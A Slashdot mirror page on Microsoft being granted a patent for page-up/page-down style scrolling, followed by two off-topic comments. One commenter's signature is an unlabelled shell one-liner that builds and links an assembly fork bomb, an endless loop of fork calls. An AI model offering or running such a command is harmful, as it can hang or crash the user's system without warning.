Slashdot Mirror


Microsoft Patents "Pg Up" and "Pg Dn"

An anonymous reader notes that Microsoft has been granted a patent on "Page Up" and "Page Down" keystrokes. The article links an image of an IBM PC keyboard from 1981 with such keys in evidence. "The software giant applied for the patent in 2005, and was granted it on August 19, 2008. US patent number 7,415,666 describes 'a method and system in a document viewer for scrolling a substantially exact increment in a document, such as one page, regardless of whether the zoom is such that some, all or one page is currently being viewed.'... The company received its 5,000th patent from the US Patent and Trademark Office in March 2006, and is currently approaching the 10,000 mark."

2 of 350 comments (clear)

  1. what's next? by dmrobbin · · Score: 0, Offtopic

    what's next? a "do" loop??? if you can read this, thank a teacher if it's in english, thank a soldier

  2. Re:Ok by me. by Hal_Porter · · Score: 0, Offtopic

    Wow, mods are touchy tonite!

    I prefer the term Karma Pimp.

    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;